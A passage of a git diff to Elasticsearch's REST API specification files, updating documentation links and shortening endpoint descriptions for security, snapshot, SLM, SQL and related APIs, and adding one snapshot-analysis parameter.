"url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-logout.html", - "description":"Invalidates an access token and a refresh token that were generated via the SAML Authenticate API" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-logout", + "description":"Logout of SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json index 5691e0d0792ff..a336d45626332 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json @@ -1,8 +1,8 @@ { "security.saml_prepare_authentication":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-prepare-authentication.html", - "description":"Creates a SAML authentication request" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-prepare-authentication", + "description":"Prepare SAML authentication" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json index 7f7cd557821cc..3d9ffe33f3d74 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json @@ -1,8 +1,8 @@ { "security.saml_service_provider_metadata":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-sp-metadata.html", - "description":"Generates SAML metadata for the Elastic stack SAML 2.0 Service Provider" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-service-provider-metadata", + "description":"Create SAML service provider metadata" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json index b52b2b74469e8..1846497e4fa20 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json @@ -1,8 +1,8 @@ { "security.suggest_user_profiles":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-suggest-user-profile.html", - "description":"Get suggestions for user profiles that match specified search criteria." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-suggest-user-profiles", + "description":"Suggest a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json index ff79d3737113f..fce390eadbf13 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json @@ -1,8 +1,8 @@ { "security.update_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-api-key.html", - "description": "Updates attributes of an existing API key." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-api-key", + "description": "Update an API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json index e59d6c1efccf8..de518d73732b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json @@ -1,8 +1,8 @@ { "security.update_cross_cluster_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-cross-cluster-api-key.html", - "description": "Updates attributes of an existing cross-cluster API key." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-cross-cluster-api-key", + "description": "Update a cross-cluster API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json index 998548408c5db..bd71a49d99bb0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json @@ -1,8 +1,8 @@ { "security.update_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-settings.html", - "description":"Update settings for the security system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-settings", + "description":"Update security index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json index 8324606a75b44..08089460c1127 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json @@ -1,8 +1,8 @@ { "security.update_user_profile_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-user-profile-data.html", - "description":"Update application specific data for the user profile of the given unique ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-user-profile-data", + "description":"Update user profile data" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json index 6f1ec484e94d0..cc7144077e4e9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json @@ -1,8 +1,8 @@ { "shutdown.delete_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Removes a node from the shutdown list. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-delete-node", + "description":"Cancel node shutdown preparations" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json index b29bf5304f782..450f3a5088650 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json @@ -1,8 +1,8 @@ { "shutdown.get_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Retrieve status of a node or nodes that are currently marked as shutting down. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-get-node", + "description":"Get the shutdown status" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json index 90b19557f5fb2..3df5f36b48119 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json @@ -1,8 +1,8 @@ { "shutdown.put_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Adds a node to be shut down. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-put-node", + "description":"Prepare a node to be shut down" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json b/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json index 91e7153d466da..401599f5d3344 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json @@ -1,8 +1,8 @@ { "simulate.ingest":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-ingest-api.html", - "description":"Simulates running ingest with example documents." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-simulate-ingest", + "description":"Simulate data ingestion" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json index 1d66312f053c7..a29caba21a016 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json @@ -1,8 +1,8 @@ { "slm.delete_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-delete-policy.html", - "description":"Deletes an existing snapshot lifecycle policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-delete-lifecycle", + "description":"Delete a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json index 71f1727a8638b..e2ff85a2c4697 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json @@ -1,8 +1,8 @@ { "slm.execute_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-execute-lifecycle.html", - "description":"Immediately creates a snapshot according to the lifecycle policy, without waiting for the scheduled time." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-lifecycle", + "description":"Run a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json index 4166122d5bf1d..dc3777d8a9b97 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json @@ -1,8 +1,8 @@ { "slm.execute_retention":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-execute-retention.html", - "description":"Deletes any snapshots that are expired according to the policy's retention rules." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-retention", + "description":"Run a retention policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json index 406fee6015522..5f543ba257953 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json @@ -1,8 +1,8 @@ { "slm.get_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-get-policy.html", - "description":"Retrieves one or more snapshot lifecycle policy definitions and information about the latest snapshot attempts." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-lifecycle", + "description":"Get policy information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json index 05281ff46cb8d..ffe51da671641 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json @@ -1,8 +1,8 @@ { "slm.get_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/slm-api-get-stats.html", - "description":"Returns global and policy-level statistics about actions taken by snapshot lifecycle management." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-stats", + "description":"Get snapshot lifecycle management statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json index 404f92f55921f..95b583e5c57fd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json @@ -1,8 +1,8 @@ { "slm.get_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-get-status.html", - "description":"Retrieves the status of snapshot lifecycle management (SLM)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-status", + "description":"Get the snapshot lifecycle management status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json index 621ed870ffdbe..9e6c32289b632 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json @@ -1,8 +1,8 @@ { "slm.put_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-put-policy.html", - "description":"Creates or updates a snapshot lifecycle policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-put-lifecycle", + "description":"Create or update a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json index e8932ab3020a0..d293b169f0dfc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json @@ -1,8 +1,8 @@ { "slm.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-start.html", - "description":"Turns on snapshot lifecycle management (SLM)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-start", + "description":"Start snapshot lifecycle management" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json index 3762a237d2168..3fe7c78ac3334 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json @@ -1,8 +1,8 @@ { "slm.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-stop.html", - "description":"Turns off snapshot lifecycle management (SLM)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-stop", + "description":"Stop snapshot lifecycle management" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json index 3d048bf671c49..3e80fb4dbc0d5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json @@ -1,8 +1,8 @@ { "snapshot.cleanup_repository": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/clean-up-snapshot-repo-api.html", - "description": "Removes stale data from repository." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-cleanup-repository", + "description": "Clean up the snapshot repository" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json index da9409110aab4..3006a514bc6df 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json @@ -1,8 +1,8 @@ { "snapshot.clone":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Clones indices from one snapshot into another snapshot in the same repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-clone", + "description":"Clone a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json index 7f70def77adf5..352f68ab2f988 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json @@ -1,8 +1,8 @@ { "snapshot.create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Creates a snapshot in a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create", + "description":"Create a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json index 504abd3d0765d..de7430167b4d8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json @@ -1,8 +1,8 @@ { "snapshot.create_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Creates a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create-repository", + "description":"Create or update a snapshot repository" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json index 74a6a0a76eda6..af0adb7f24d25 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json @@ -1,8 +1,8 @@ { "snapshot.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Deletes one or more snapshots." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete", + "description":"Delete snapshots" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json index 8b6ce52d382f5..58d09fb7a07cd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json @@ -1,8 +1,8 @@ { "snapshot.delete_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Deletes a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete-repository", + "description":"Delete snapshot repositories" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json index f40042c1b0dac..b5f6fd5d2997f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json @@ -1,8 +1,8 @@ { "snapshot.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get", + "description":"Get snapshot information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json index c85d018079697..6e857896ff925 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json @@ -1,8 +1,8 @@ { "snapshot.get_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get-repository", + "description":"Get snapshot repository information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json index 2578cd5684d6d..cdaba4ea5809b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json @@ -1,8 +1,8 @@ { "snapshot.repository_analyze":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Analyzes a repository for correctness and performance" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-analyze", + "description":"Analyze a snapshot repository" }, "stability":"stable", "visibility":"public", @@ -36,6 +36,10 @@ "type":"number", "description":"Number of operations to run concurrently during the test. Defaults to 10." }, + "register_operation_count":{ + "type":"number", + "description":"The minimum number of linearizable register operations to perform in total. Defaults to 10." + }, "read_node_count":{ "type":"number", "description":"Number of nodes on which to read a blob after writing. Defaults to 10." diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json index 746b8ec36e993..f01ac84484692 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json @@ -1,8 +1,8 @@ { "snapshot.repository_verify_integrity":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Verifies the integrity of the contents of a snapshot repository" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-verify-integrity", + "description":"Verify the repository integrity" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json index c4ecb5571dafe..cffff36bdafe9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json @@ -1,8 +1,8 @@ { "snapshot.restore":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Restores a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-restore", + "description":"Restore a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json index e5f1af202d3e9..abf7d598fb0a4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json @@ -1,8 +1,8 @@ { "snapshot.status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about the status of a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-status", + "description":"Get the snapshot status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json index ce5c1d2935ddb..c64301de4d303 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json @@ -1,8 +1,8 @@ { "snapshot.verify_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Verifies a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-verify-repository", + "description":"Verify a snapshot repository" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json index f36f623816b6f..a70c9c07ccba6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json @@ -1,8 +1,8 @@ { "sql.clear_cursor":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-sql-cursor-api.html", - "description":"Clears the SQL cursor" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-clear-cursor", + "description":"Clear an SQL search cursor" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json index 1a2a6f6c4c052..bc0165b0eed68 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json @@ -1,8 +1,8 @@ { "sql.delete_async": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-async-sql-search-api.html", - "description": "Deletes an async SQL search or a stored synchronous SQL search. If the search is still running, the API cancels it." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-delete-async", + "description": "Delete an async SQL search" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json index d0a5a3c565a18..fda1c3e40b861 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json @@ -1,8 +1,8 @@ { "sql.get_async": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-async-sql-search-api.html", - "description": "Returns the current status and available results for an async SQL search or stored synchronous SQL search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async", + "description": "Get async SQL search results" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json index d433063d93c85..739116eb79d63 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json @@ -1,8 +1,8 @@ { "sql.get_async_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-async-sql-search-status-api.html", - "description": "Returns the current status of an async SQL search or a stored synchronous SQL search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async-status", + "description": "Get the async SQL search status" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json index a3fe47ecdf40e..64a9e6a3c4fd0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json @@ -1,8 +1,8 @@ { "sql.query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/sql-search-api.html", - "description":"Executes a SQL request" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-query", + "description":"Get SQL search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json index 99f9216f88ce6..70bb7928eaedb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json @@ -1,8 +1,8 @@ { "sql.translate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/sql-translate-api.html", - "description":"Translates SQL into Elasticsearch queries" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-translate", + "description":"Translate SQL into Elasticsearch queries" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json index 233bc0882a87f..62864e3e08a0f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json @@ -1,8 +1,8 @@ { "ssl.certificates":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-ssl.html", - "description":"Retrieves information about the X.509 certificates used to encrypt communications in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ssl-certificates", + "description":"Get SSL certificates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json 